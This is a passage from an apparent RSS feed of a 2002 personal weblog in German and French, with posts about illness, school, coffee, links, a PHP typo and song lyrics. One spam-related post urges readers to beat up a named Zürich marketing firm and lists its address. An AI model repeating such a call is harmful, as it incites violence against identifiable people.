  14610.    <description><![CDATA[J'ai changé un peu mon système du weblog. Vous pouvez maintenant changer la langue de la navigation et du contenu, le nombre des entrées montrées. Et si vous faites un commentaire, votre nom, votre e-mail et votre website seraient mémorisés.
  14611. ]]></description>
  14612.    <content:encoded><![CDATA[J'ai changé un peu mon système du weblog. Vous pouvez maintenant changer la langue de la navigation et du contenu, le nombre des entrées montrées. Et si vous faites un commentaire, votre nom, votre e-mail et votre website seraient mémorisés.
  14613. ]]></content:encoded>
  14614.  </item>
  14615.  
  14616.  <item>
  14617.    <title>Einstellungen (!!) --></title>
  14618.    <link>https://blog.x-way.org/Coding/2002/11/09/Einstellungen__--.html</link>
  14619.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=153</guid>
  14620.    <dc:creator>Andreas Jaggi</dc:creator>
  14621.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14622.    <pubDate>Sat, 09 Nov 2002 18:19:00 +0000</pubDate>
  14623.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  14624.    <description><![CDATA[ich hab noch mal ein bisschen gebastelt. Rausgekommen ist, dass man nun unter <b>Einstellungen</b> einstellen kann, in welcher Sprache die Navigation erscheinen soll, in welcher Sprache die Inhalte erscheinen sollen und wieviele Einträge auf der Startseite angezeigt werden.<br>Desweiteren werden nun Name, E-Mail und Website beim kommentieren gespeichert.<br>All das funktioniert via ein Cookie, daher bitte aktivieren, wer davon Gebrauch machen möchte.
  14625. ]]></description>
  14626.    <content:encoded><![CDATA[ich hab noch mal ein bisschen gebastelt. Rausgekommen ist, dass man nun unter <b>Einstellungen</b> einstellen kann, in welcher Sprache die Navigation erscheinen soll, in welcher Sprache die Inhalte erscheinen sollen und wieviele Einträge auf der Startseite angezeigt werden.<br>Desweiteren werden nun Name, E-Mail und Website beim kommentieren gespeichert.<br>All das funktioniert via ein Cookie, daher bitte aktivieren, wer davon Gebrauch machen möchte.
  14627. ]]></content:encoded>
  14628.  </item>
  14629.  
  14630.  <item>
  14631.    <title>Blanc</title>
  14632.    <link>https://blog.x-way.org/Misc/2002/11/09/Blanc.html</link>
  14633.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=152</guid>
  14634.    <dc:creator>Andreas Jaggi</dc:creator>
  14635.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14636.    <pubDate>Sat, 09 Nov 2002 13:56:00 +0000</pubDate>
  14637.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  14638.    <description><![CDATA[Il y a de la neige!<br>Il fait très froid et je pense que je ne suis pas encore guéri totelement de la grippe.
  14639. ]]></description>
  14640.    <content:encoded><![CDATA[Il y a de la neige!<br>Il fait très froid et je pense que je ne suis pas encore guéri totelement de la grippe.
  14641. ]]></content:encoded>
  14642.  </item>
  14643.  
  14644.  <item>
  14645.    <title>wb</title>
  14646.    <link>https://blog.x-way.org/Misc/2002/11/07/wb.html</link>
  14647.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=151</guid>
  14648.    <dc:creator>Andreas Jaggi</dc:creator>
  14649.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14650.    <pubDate>Thu, 07 Nov 2002 23:49:00 +0000</pubDate>
  14651.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  14652.    <description><![CDATA[Mir gehts wieder besser. Mit dem Schulaufsuchen hats heute auch geklappt ;-)<br><br><a href="http://www.schockwellenreiter.de/"><b>Der Schockwellenreiter</b></a> hat eine neue Programmiersprache <a href="http://www.schockwellenreiter.de/2002/11/07.html#a8997"><b>entdeckt</b></a>: <a href="http://w3future.com/weblog/2002/11/07.html#a139"><b>Loell</b></a>.<br>Nicht zu vergessen, dass Löl auf Schweizerdeutsch etwa soviel wie Idiot heisst ;-P
  14653. ]]></description>
  14654.    <content:encoded><![CDATA[Mir gehts wieder besser. Mit dem Schulaufsuchen hats heute auch geklappt ;-)<br><br><a href="http://www.schockwellenreiter.de/"><b>Der Schockwellenreiter</b></a> hat eine neue Programmiersprache <a href="http://www.schockwellenreiter.de/2002/11/07.html#a8997"><b>entdeckt</b></a>: <a href="http://w3future.com/weblog/2002/11/07.html#a139"><b>Loell</b></a>.<br>Nicht zu vergessen, dass Löl auf Schweizerdeutsch etwa soviel wie Idiot heisst ;-P
  14655. ]]></content:encoded>
  14656.  </item>
  14657.  
  14658.  <item>
  14659.    <title>Krank ist krank</title>
  14660.    <link>https://blog.x-way.org/Misc/2002/11/06/Krank_ist_krank.html</link>
  14661.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=150</guid>
  14662.    <dc:creator>Andreas Jaggi</dc:creator>
  14663.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14664.    <pubDate>Wed, 06 Nov 2002 12:00:00 +0000</pubDate>
  14665.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  14666.    <description><![CDATA[Bin doch nicht in die Schule gegangen, da mein Fieber wieder auf fast 39° gestiegen ist :-(
  14667. ]]></description>
  14668.    <content:encoded><![CDATA[Bin doch nicht in die Schule gegangen, da mein Fieber wieder auf fast 39° gestiegen ist :-(
  14669. ]]></content:encoded>
  14670.  </item>
  14671.  
  14672.  <item>
  14673.    <title>Darniederliegend</title>
  14674.    <link>https://blog.x-way.org/Misc/2002/11/05/Darniederliegend.html</link>
  14675.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=149</guid>
  14676.    <dc:creator>Andreas Jaggi</dc:creator>
  14677.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14678.    <pubDate>Tue, 05 Nov 2002 16:53:00 +0000</pubDate>
  14679.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  14680.    <description><![CDATA[Die Grippe oder was auch immer das war, hatte mich erwischt. Aber jetzt scheints wieder besser zu gehen. Morgen gehe ich auch wieder in die Schule, andere Leute anstecken. *hehe*
  14681. ]]></description>
  14682.    <content:encoded><![CDATA[Die Grippe oder was auch immer das war, hatte mich erwischt. Aber jetzt scheints wieder besser zu gehen. Morgen gehe ich auch wieder in die Schule, andere Leute anstecken. *hehe*
  14683. ]]></content:encoded>
  14684.  </item>
  14685.  
  14686.  <item>
  14687.    <title>Arcachon</title>
  14688.    <link>https://blog.x-way.org/Misc/2002/11/02/Arcachon.html</link>
  14689.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=148</guid>
  14690.    <dc:creator>Andreas Jaggi</dc:creator>
  14691.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14692.    <pubDate>Sat, 02 Nov 2002 23:18:00 +0000</pubDate>
  14693.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  14694.    <description><![CDATA[Quand il pleut tout le jour comme aujourd'hui, j'aimerais être <a href="http://www.arcachon.com/"><b>là</b></a>.
  14695. ]]></description>
  14696.    <content:encoded><![CDATA[Quand il pleut tout le jour comme aujourd'hui, j'aimerais être <a href="http://www.arcachon.com/"><b>là</b></a>.
  14697. ]]></content:encoded>
  14698.  </item>
  14699.  
  14700.  <item>
  14701.    <title>SPAM 2. !!!</title>
  14702.    <link>https://blog.x-way.org/Misc/2002/11/02/SPAM_2_.html</link>
  14703.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=147</guid>
  14704.    <dc:creator>Andreas Jaggi</dc:creator>
  14705.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14706.    <pubDate>Sat, 02 Nov 2002 16:59:00 +0000</pubDate>
  14707.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  14708.    <description><![CDATA[Wenn wir schon dran sind können wir hier weiterfahren. Ist eben auch noch gerade eine SPAM-Mail gekommen.<br><br>Business Corporation for W+L. AG, Rautistrasse 71, 8048 Zürich
  14709. ]]></description>
  14710.    <content:encoded><![CDATA[Wenn wir schon dran sind können wir hier weiterfahren. Ist eben auch noch gerade eine SPAM-Mail gekommen.<br><br>Business Corporation for W+L. AG, Rautistrasse 71, 8048 Zürich
  14711. ]]></content:encoded>
  14712.  </item>
  14713.  
  14714.  <item>
  14715.    <title>SPAAAAAAAAAAAAAAAAAAM !!!</title>
  14716.    <link>https://blog.x-way.org/Misc/2002/11/02/SPAAAAAAAAAAAAAAAAAAM_.html</link>
  14717.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=146</guid>
  14718.    <dc:creator>Andreas Jaggi</dc:creator>
  14719.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14720.    <pubDate>Sat, 02 Nov 2002 16:56:00 +0000</pubDate>
  14721.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  14722.    <description><![CDATA[Könnte mal jemand aus Zürich hier vorbeigehen und denen mal so ganz tüchtig die Fresse verhauen.<br><br>Fürst E-Marketing, Badenerstr. 653, 8048 Zürich,  Fax: (043) 317 02 85
  14723. ]]></description>
  14724.    <content:encoded><![CDATA[Könnte mal jemand aus Zürich hier vorbeigehen und denen mal so ganz tüchtig die Fresse verhauen.<br><br>Fürst E-Marketing, Badenerstr. 653, 8048 Zürich,  Fax: (043) 317 02 85
  14725. ]]></content:encoded>
  14726.  </item>
  14727.  
  14728.  <item>
  14729.    <title>Der richtige Kaffee</title>
  14730.    <link>https://blog.x-way.org/School/2002/11/02/Der_richtige_Kaffee.html</link>
  14731.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=145</guid>
  14732.    <dc:creator>Andreas Jaggi</dc:creator>
  14733.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14734.    <pubDate>Sat, 02 Nov 2002 16:02:00 +0000</pubDate>
  14735.    <category domain="https://blog.x-way.org/School">School</category>
  14736.    <description><![CDATA[Für alle die beim <a href="https://web.archive.org/web/20030209031229/www.gymhmsschadau.ch"><b>Gymnasium Thun-Schadau</b></a> den Kaffeeautomat benützen gibt die Anleitung zum superstarken, maximal aufweckenden und sauschlecht schmeckenden Kaffee:<br><br>- 80 Rappen einwerfen<br>- Option "Espresso" wählen (macht nur halb soviel Wasser rein -&gt; doppelt so stark ;-)<br>- den Knopf "Mehr Zucker" drücken, bis das Maximum ausgewählt ist<br>- den Knopf "Aufheller" drücken, bis das Minimum erreicht ist<br>- den Kaffee "Nescafe mit Zucker" auswählen (nicht verwechseln mit "Nescafe" !! ;-)<br><br>- Becher entnehmen und einen Schluck nehmen.<br>Für nicht routinierte Kaffeetrinker gilt: nicht ausspucken, auch wenn es einem den Mund zusammenzieht und nach Abwaschwasser schmeckt ;-P<br>Alle anderen können sich an ihrem aufweckenden Getränk erfreuen ;-)
  14737. ]]></description>
  14738.    <content:encoded><![CDATA[Für alle die beim <a href="https://web.archive.org/web/20030209031229/www.gymhmsschadau.ch"><b>Gymnasium Thun-Schadau</b></a> den Kaffeeautomat benützen gibt die Anleitung zum superstarken, maximal aufweckenden und sauschlecht schmeckenden Kaffee:<br><br>- 80 Rappen einwerfen<br>- Option "Espresso" wählen (macht nur halb soviel Wasser rein -&gt; doppelt so stark ;-)<br>- den Knopf "Mehr Zucker" drücken, bis das Maximum ausgewählt ist<br>- den Knopf "Aufheller" drücken, bis das Minimum erreicht ist<br>- den Kaffee "Nescafe mit Zucker" auswählen (nicht verwechseln mit "Nescafe" !! ;-)<br><br>- Becher entnehmen und einen Schluck nehmen.<br>Für nicht routinierte Kaffeetrinker gilt: nicht ausspucken, auch wenn es einem den Mund zusammenzieht und nach Abwaschwasser schmeckt ;-P<br>Alle anderen können sich an ihrem aufweckenden Getränk erfreuen ;-)
  14739. ]]></content:encoded>
  14740.  </item>
  14741.  
  14742.  <item>
  14743.    <title>Pour les Gamers</title>
  14744.    <link>https://blog.x-way.org/Tech/2002/11/01/Pour_les_Gamers.html</link>
  14745.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=144</guid>
  14746.    <dc:creator>Andreas Jaggi</dc:creator>
  14747.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14748.    <pubDate>Fri, 01 Nov 2002 16:53:00 +0000</pubDate>
  14749.    <category domain="https://blog.x-way.org/Tech">Tech</category>
  14750.    <description><![CDATA[<a href="http://www.firestormpc.com"><b>Ici</b></a> on trouve un écran panorama ultimatif avec un ordinateur performante.
  14751. ]]></description>
  14752.    <content:encoded><![CDATA[<a href="http://www.firestormpc.com"><b>Ici</b></a> on trouve un écran panorama ultimatif avec un ordinateur performante.
  14753. ]]></content:encoded>
  14754.  </item>
  14755.  
  14756.  <item>
  14757.    <title>Pochette Surprise</title>
  14758.    <link>https://blog.x-way.org/Misc/2002/11/01/Pochette_Surprise.html</link>
  14759.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=143</guid>
  14760.    <dc:creator>Andreas Jaggi</dc:creator>
  14761.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14762.    <pubDate>Fri, 01 Nov 2002 16:37:00 +0000</pubDate>
  14763.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  14764.    <description><![CDATA[<a href="https://web.archive.org/web/20021120013343/http://nplmdth.blogspot.com/"><b>Voilà</b></a> un autre weblog intéressant.
  14765. ]]></description>
  14766.    <content:encoded><![CDATA[<a href="https://web.archive.org/web/20021120013343/http://nplmdth.blogspot.com/"><b>Voilà</b></a> un autre weblog intéressant.
  14767. ]]></content:encoded>
  14768.  </item>
  14769.  
  14770.  <item>
  14771.    <title>coffee.ch</title>
  14772.    <link>https://blog.x-way.org/Misc/2002/11/01/coffeech.html</link>
  14773.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=142</guid>
  14774.    <dc:creator>Andreas Jaggi</dc:creator>
  14775.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14776.    <pubDate>Fri, 01 Nov 2002 12:53:00 +0000</pubDate>
  14777.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  14778.    <description><![CDATA['Heiss wie die Hölle, schwarz wie der Teufel , rein wie ein Engel und süss wie die Liebe' - so muss der Kaffee sein.<br><br>Charles Maurice Talleyrand<br><br><a href="https://web.archive.org/web/20021123162302/http://www.coffee.ch/"><b>coffee.ch</b></a>
  14779. ]]></description>
  14780.    <content:encoded><![CDATA['Heiss wie die Hölle, schwarz wie der Teufel , rein wie ein Engel und süss wie die Liebe' - so muss der Kaffee sein.<br><br>Charles Maurice Talleyrand<br><br><a href="https://web.archive.org/web/20021123162302/http://www.coffee.ch/"><b>coffee.ch</b></a>
  14781. ]]></content:encoded>
  14782.  </item>
  14783.  
  14784.  <item>
  14785.    <title>Large-Scale PHP Projects</title>
  14786.    <link>https://blog.x-way.org/Coding/2002/11/01/Large-Scale_PHP_Projects.html</link>
  14787.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=141</guid>
  14788.    <dc:creator>Andreas Jaggi</dc:creator>
  14789.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14790.    <pubDate>Fri, 01 Nov 2002 12:30:00 +0000</pubDate>
  14791.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  14792.    <description><![CDATA[Bevor ich's wieder vergesse:<br><a href="http://www.schockwellenreiter.de/2002/10/30.html#a8830"><b>Der Schockwellenreiter</b></a> hat einen interessanten <a href="https://web.archive.org/web/20021031062942/http://www.fuzzygroup.com/phpcon2002/engineering/index_files/frame.htm"><b>Artikel</b></a> über das managen von grossen PHP Projekten gefunden.
  14793. ]]></description>
  14794.    <content:encoded><![CDATA[Bevor ich's wieder vergesse:<br><a href="http://www.schockwellenreiter.de/2002/10/30.html#a8830"><b>Der Schockwellenreiter</b></a> hat einen interessanten <a href="https://web.archive.org/web/20021031062942/http://www.fuzzygroup.com/phpcon2002/engineering/index_files/frame.htm"><b>Artikel</b></a> über das managen von grossen PHP Projekten gefunden.
  14795. ]]></content:encoded>
  14796.  </item>
  14797.  
  14798.  <item>
  14799.    <title>Nun geht's wieder</title>
  14800.    <link>https://blog.x-way.org/Coding/2002/10/30/Nun_gehts_wieder.html</link>
  14801.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=140</guid>
  14802.    <dc:creator>Andreas Jaggi</dc:creator>
  14803.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14804.    <pubDate>Wed, 30 Oct 2002 17:42:00 +0000</pubDate>
  14805.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  14806.    <description><![CDATA[Das Kommentarzeugs hat nicht mehr funktioniert, wie ihr vielleicht gemerkt habt. Grund dafür war ein Tippfehler im PHP-Code.<pre>$layout = new layout('plain', 1<span style="color: #ff0000">,</span>);</pre>funktioniert definitiv nicht.<br><br>Kommt davon, wenn man in der Geisterstunde am PHP-Code bastelt ;-)
  14807. ]]></description>
  14808.    <content:encoded><![CDATA[Das Kommentarzeugs hat nicht mehr funktioniert, wie ihr vielleicht gemerkt habt. Grund dafür war ein Tippfehler im PHP-Code.<pre>$layout = new layout('plain', 1<span style="color: #ff0000">,</span>);</pre>funktioniert definitiv nicht.<br><br>Kommt davon, wenn man in der Geisterstunde am PHP-Code bastelt ;-)
  14809. ]]></content:encoded>
  14810.  </item>
  14811.  
  14812.  <item>
  14813.    <title>--- One of a kind ---</title>
  14814.    <link>https://blog.x-way.org/Misc/2002/10/30/---_One_of_a_kind_---.html</link>
  14815.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=139</guid>
  14816.    <dc:creator>Andreas Jaggi</dc:creator>
  14817.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14818.    <pubDate>Wed, 30 Oct 2002 15:30:00 +0000</pubDate>
  14819.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  14820.    <description><![CDATA[<a href="https://web.archive.org/web/20031002223028/http://www30.brinkster.com/shivasan/"><b>Ici</b></a> j'ai trouvé un autre weblog français.
  14821. ]]></description>
  14822.    <content:encoded><![CDATA[<a href="https://web.archive.org/web/20031002223028/http://www30.brinkster.com/shivasan/"><b>Ici</b></a> j'ai trouvé un autre weblog français.
  14823. ]]></content:encoded>
  14824.  </item>
  14825.  
  14826.  <item>
  14827.    <title>S'il vous intéresse</title>
  14828.    <link>https://blog.x-way.org/Misc/2002/10/30/Sil_vous_interesse.html</link>
  14829.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=138</guid>
  14830.    <dc:creator>Andreas Jaggi</dc:creator>
  14831.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14832.    <pubDate>Wed, 30 Oct 2002 00:48:00 +0000</pubDate>
  14833.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  14834.    <description><![CDATA[<a href="https://blog.x-way.org/images/30102002003025.png"><b>Voilà</b></a> une capture de mon écran.<br>Pas très intéressante je sais ;-)
  14835. ]]></description>
  14836.    <content:encoded><![CDATA[<a href="https://blog.x-way.org/images/30102002003025.png"><b>Voilà</b></a> une capture de mon écran.<br>Pas très intéressante je sais ;-)
  14837. ]]></content:encoded>
  14838.  </item>
  14839.  
  14840.  <item>
  14841.    <title>Im Radio gehört</title>
  14842.    <link>https://blog.x-way.org/Music/2002/10/29/Im_Radio_gehoert.html</link>
  14843.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=137</guid>
  14844.    <dc:creator>Andreas Jaggi</dc:creator>
  14845.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14846.    <pubDate>Tue, 29 Oct 2002 22:32:00 +0000</pubDate>
  14847.    <category domain="https://blog.x-way.org/Music">Music</category>
  14848.    <description><![CDATA[<a href="http://www.kateryan.be/"><b>Kate Ryan - Désenchantée</b></a> ist leider eine Cover-Version von <a href="http://www.mylene-farmer.com/"><b>Mylene Farmer - Désenchatée</b></a>
  14849. ]]></description>
  14850.    <content:encoded><![CDATA[<a href="http://www.kateryan.be/"><b>Kate Ryan - Désenchantée</b></a> ist leider eine Cover-Version von <a href="http://www.mylene-farmer.com/"><b>Mylene Farmer - Désenchatée</b></a>
  14851. ]]></content:encoded>
  14852.  </item>
  14853.  
  14854.  <item>
  14855.    <title>Un de plus</title>
  14856.    <link>https://blog.x-way.org/Misc/2002/10/29/Un_de_plus.html</link>
  14857.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=136</guid>
  14858.    <dc:creator>Andreas Jaggi</dc:creator>
  14859.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14860.    <pubDate>Tue, 29 Oct 2002 20:32:00 +0000</pubDate>
  14861.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  14862.    <description><![CDATA[J'ai ajouté <a href="https://web.archive.org/web/20021019220621/http://iquebec.ifrance.com/bloghappy/"><b>le Shadow Blog</b></a> à ma liste des weblogs souvent visités.
  14863. ]]></description>
  14864.    <content:encoded><![CDATA[J'ai ajouté <a href="https://web.archive.org/web/20021019220621/http://iquebec.ifrance.com/bloghappy/"><b>le Shadow Blog</b></a> à ma liste des weblogs souvent visités.
  14865. ]]></content:encoded>
  14866.  </item>
  14867.  
  14868.  <item>
  14869.    <title>Je vis dans la nuit</title>
  14870.    <link>https://blog.x-way.org/Misc/2002/10/28/Je_vis_dans_la_nuit.html</link>
  14871.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=135</guid>
  14872.    <dc:creator>Andreas Jaggi</dc:creator>
  14873.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14874.    <pubDate>Mon, 28 Oct 2002 22:47:00 +0000</pubDate>
  14875.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  14876.    <description><![CDATA[Hier soir j'ai travaillé jusqu'à 04.45. Et je devais me lever à 05.05. Bon, à l'école je me suis présque endormi ;-)<br>Quand je suis arrivé à la maison à 2 heures le matin, je me suis endormi tout de suite et je me suis reveillé jusqu'avant quelques minutes ;-)<br><br>Je dors le jour et je vis la nuit ;-)<br><br><span style="text-decoration: line-through;">Corrécture:</span> <span style="color: #FF0000;">Correction:</span><br>C'était à 2 heures l'après-midi quand je me suis immédiatement endormi, pas à 2 heures le matin.
  14877. ]]></description>
  14878.    <content:encoded><![CDATA[Hier soir j'ai travaillé jusqu'à 04.45. Et je devais me lever à 05.05. Bon, à l'école je me suis présque endormi ;-)<br>Quand je suis arrivé à la maison à 2 heures le matin, je me suis endormi tout de suite et je me suis reveillé jusqu'avant quelques minutes ;-)<br><br>Je dors le jour et je vis la nuit ;-)<br><br><span style="text-decoration: line-through;">Corrécture:</span> <span style="color: #FF0000;">Correction:</span><br>C'était à 2 heures l'après-midi quand je me suis immédiatement endormi, pas à 2 heures le matin.
  14879. ]]></content:encoded>
  14880.  </item>
  14881.  
  14882.  <item>
  14883.    <title>Hehe</title>
  14884.    <link>https://blog.x-way.org/Misc/2002/10/28/Hehe.html</link>
  14885.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=134</guid>
  14886.    <dc:creator>Andreas Jaggi</dc:creator>
  14887.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14888.    <pubDate>Mon, 28 Oct 2002 22:09:00 +0000</pubDate>
  14889.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  14890.    <description><![CDATA[Ich hab ja wegen dem <a href="http://waterwave.ch/weblog/detail.php?id=130"><b>Auftrag fürs Zeichnen</b></a> letzte Nacht nur gerade 20 Minuten geschlafen (von 4.45 bis 5.05 Uhr;). Dafür wars dann in der Schule umso lustiger (Ich muss die Augen offen halten.... Ich muss die Augen offenhalten ...). Bei den fünf Lektionen die wir hatten wars gerade noch so aushaltbar.<br>Natürlich hab ich dann auf der Heimfahrt im Zug einfach fast ne volle Stunde gepennt (die Leute werden sich gefragt haben, um 13 Uhr ;-). Zuhause angekommen wollte ich ja ein paar neue Features für mein Weblog einbauen. Nachdem der Computer mit den entsprechenden Programmen aufgestartet war, hab ich mich wirklich nur für 20 Sekunden hingelegt (um 14.30 Uhr).<br>Aufgewacht bin ich erst jetzt ;-)<br><br>Komischerweise hab ich, obwohl ich saumüde war, sehr viel geträumt; und zwar ausschliesslich von UT, Quake und so Zeugs :-)<br>Im Aufwachen hab ich mich noch gewundert, dass ich jetzt so schön geträumt habe. Nun stellte sich heraus, dass während der ganzen Zeit <a href="https://web.archive.org/web/20021016095349/http://www.crapradio.org/"><b>CrapRadio</b></a> am laufen war.<br>Logisch, dass ich vom Gamen träumte ;-)
  14891. ]]></description>
  14892.    <content:encoded><![CDATA[Ich hab ja wegen dem <a href="http://waterwave.ch/weblog/detail.php?id=130"><b>Auftrag fürs Zeichnen</b></a> letzte Nacht nur gerade 20 Minuten geschlafen (von 4.45 bis 5.05 Uhr;). Dafür wars dann in der Schule umso lustiger (Ich muss die Augen offen halten.... Ich muss die Augen offenhalten ...). Bei den fünf Lektionen die wir hatten wars gerade noch so aushaltbar.<br>Natürlich hab ich dann auf der Heimfahrt im Zug einfach fast ne volle Stunde gepennt (die Leute werden sich gefragt haben, um 13 Uhr ;-). Zuhause angekommen wollte ich ja ein paar neue Features für mein Weblog einbauen. Nachdem der Computer mit den entsprechenden Programmen aufgestartet war, hab ich mich wirklich nur für 20 Sekunden hingelegt (um 14.30 Uhr).<br>Aufgewacht bin ich erst jetzt ;-)<br><br>Komischerweise hab ich, obwohl ich saumüde war, sehr viel geträumt; und zwar ausschliesslich von UT, Quake und so Zeugs :-)<br>Im Aufwachen hab ich mich noch gewundert, dass ich jetzt so schön geträumt habe. Nun stellte sich heraus, dass während der ganzen Zeit <a href="https://web.archive.org/web/20021016095349/http://www.crapradio.org/"><b>CrapRadio</b></a> am laufen war.<br>Logisch, dass ich vom Gamen träumte ;-)
  14893. ]]></content:encoded>
  14894.  </item>
  14895.  
  14896.  <item>
  14897.    <title>TCPA / Palladium</title>
  14898.    <link>https://blog.x-way.org/Tech/2002/10/28/TCPA__Palladium.html</link>
  14899.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=133</guid>
  14900.    <dc:creator>Andreas Jaggi</dc:creator>
  14901.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14902.    <pubDate>Mon, 28 Oct 2002 02:26:00 +0000</pubDate>
  14903.    <category domain="https://blog.x-way.org/Tech">Tech</category>
  14904.    <description><![CDATA[<a href="https://web.archive.org/web/20021014170153/http://moon.hipjoint.de/tcpa-palladium-faq-de.html"><b>hier</b></a> gibts eine deutsche FAQ dazu.
  14905. ]]></description>
  14906.    <content:encoded><![CDATA[<a href="https://web.archive.org/web/20021014170153/http://moon.hipjoint.de/tcpa-palladium-faq-de.html"><b>hier</b></a> gibts eine deutsche FAQ dazu.
  14907. ]]></content:encoded>
  14908.  </item>
  14909.  
  14910.  <item>
  14911.    <title>Noir Désir</title>
  14912.    <link>https://blog.x-way.org/Music/2002/10/27/Noir_Desir.html</link>
  14913.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=132</guid>
  14914.    <dc:creator>Andreas Jaggi</dc:creator>
  14915.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14916.    <pubDate>Sun, 27 Oct 2002 22:32:00 +0000</pubDate>
  14917.    <category domain="https://blog.x-way.org/Music">Music</category>
  14918.    <description><![CDATA[<a href="http://www.noirdez.com"><b>The Holy Economic War</b></a><br><br>Woke up on the ground, i've thought "the earth is round"<br>so what about this new day on my way<br>is there anything new, what are we gonna do?<br>woke up in the silence then i've heard that song<br><br>and a voite said<br><br>   "this is not a bad joke<br>   this message's done for you<br>   you've got to work hard more<br>   and more<br>   for the holy economic war".<br><br>but it couldn't be no hallucinations<br>then i've read the story of the new nations<br>lord it's just as you please, i get down on my knees<br>god, it's wonderful to find the meaning of life<br><br>   "this is not a bad joke<br>   this message's done for you<br>   invade the whole world<br>   don't forget the new password<br><br>everbody sings you have<br><br>   no choice in the matter<br>   i'll become your blessed manager<br>   you've got to produce more and more<br>   for the holy economic war".<br><br>business force...<br>marketing...<br>careers...<br>success...<br><br>oh holy yeld, oh holy hell
  14919. ]]></description>
  14920.    <content:encoded><![CDATA[<a href="http://www.noirdez.com"><b>The Holy Economic War</b></a><br><br>Woke up on the ground, i've thought "the earth is round"<br>so what about this new day on my way<br>is there anything new, what are we gonna do?<br>woke up in the silence then i've heard that song<br><br>and a voite said<br><br>   "this is not a bad joke<br>   this message's done for you<br>   you've got to work hard more<br>   and more<br>   for the holy economic war".<br><br>but it couldn't be no hallucinations<br>then i've read the story of the new nations<br>lord it's just as you please, i get down on my knees<br>god, it's wonderful to find the meaning of life<br><br>   "this is not a bad joke<br>   this message's done for you<br>   invade the whole world<br>   don't forget the new password<br><br>everbody sings you have<br><br>   no choice in the matter<br>   i'll become your blessed manager<br>   you've got to produce more and more<br>   for the holy economic war".<br><br>business force...<br>marketing...<br>careers...<br>success...<br><br>oh holy yeld, oh holy hell
  14921. ]]></content:encoded>
  14922.  </item>
  14923.  
  14924.  <item>
  14925.    <title>In Extremo</title>
  14926.    <link>https://blog.x-way.org/Music/2002/10/27/In_Extremo.html</link>
  14927.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=131</guid>
  14928.    <dc:creator>Andreas Jaggi</dc:creator>
